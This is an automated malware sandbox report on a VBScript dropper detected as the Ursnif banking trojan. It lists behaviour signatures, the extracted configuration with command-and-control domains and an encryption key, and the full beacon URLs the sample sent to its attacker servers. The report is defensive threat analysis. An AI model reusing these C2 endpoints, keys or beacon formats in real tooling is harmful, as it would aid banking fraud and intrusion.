Windows Analysis Report presentation[2021.09.09_15-26].vbs

Overview

General Information

Sample Name:	presentation[2021.09.09_15-26].vbs
Analysis ID:	482024
MD5:	783f03c1b5f346544c131ea2b164e54d
SHA1:	9100e6d4ce0edfcb161552fdf2721835f12470a2
SHA256:	683fbb9eb6fd6a0a2bab8471d1be28bd45f0598e1db19dc3f6d7536f1c4b5e8b
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Found malware configuration

Sigma detected: Powershell run code from registry

Benign windows process drops PE files

Sigma detected: Encoded IEX

Multi AV Scanner detection for dropped file

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Compiles code for process injection (via .Net compiler)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Creates processes via WMI

Allocates memory in foreign processes

Sigma detected: MSHTA Spawning Windows Shell

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Writes registry values via WMI

Writes to foreign memory regions

Suspicious powershell command line found

Modifies the prolog of user mode functions (user mode inline hooks)

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Sigma detected: Mshta Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Modifies the import address table of user mode modules (user mode IAT hooks)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Queries the installation date of Windows

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Java / VBScript file with very long strings (likely obfuscated code)

Searches for the Microsoft Outlook file path

Drops PE files

Uses a known web browser user agent for HTTP communication

Launches processes in debugging mode, may be used to hinder debugging

Compiles C# or VB.Net code

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Internet Provider seen in connection with other malware

Stores large binary data to the registry

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Enables debug privileges

AV process strings found (often used to terminate AV products)

PE file does not import any functions

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://atl.bigbigpoppa.com/_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw	Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5	Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000015.00000003.1057194752.0000000004AB0000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\fum.cpp

ReversingLabs: Detection: 55%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 21_2_04BC3276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

21_2_04BC3276

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdbXP source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdbXP source: powershell.exe, 00000019.00000002.1238604024.000001B6D76F8000.00000004.00000001.sdmp
Source:	Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.1013379730.000001BA25DFD000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.1193389238.000000006FBF4000.00000002.00020000.sdmp, fum.cpp.0.dr
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 21_2_05E61802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

21_2_05E61802

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E51577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	21_2_05E51577
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E414A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	21_2_05E414A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E56E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	21_2_05E56E4E

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49833 -> 188.127.235.42:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49833 -> 188.127.235.42:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49834 -> 188.127.235.42:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49834 -> 188.127.235.42:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49835 -> 188.127.235.42:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49835 -> 188.127.235.42:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49836 -> 188.127.235.42:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49836 -> 188.127.235.42:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 188.127.235.42 80			Jump to behavior

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic	HTTP traffic detected: GET /ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic	HTTP traffic detected: GET /fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic	HTTP traffic detected: GET /J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic	HTTP traffic detected: POST /0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: DHUBRU DHUBRU

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Sep 2021 09:05:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000019.00000003.1134490051.000001B6EB600000.00000004.00000001.sdmp	String found in binary or memory: http://crl.m-
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000019.00000002.1216995781.000001B6D2DE1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown

DNS traffic detected: queries for: atl.bigbigpoppa.com

Source: global traffic	HTTP traffic detected: GET /_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic	HTTP traffic detected: GET /ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic	HTTP traffic detected: GET /fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic	HTTP traffic detected: GET /J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at

Source: unknown

HTTP traffic detected: POST /0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
Source: Yara match	File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
Source: Yara match	File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
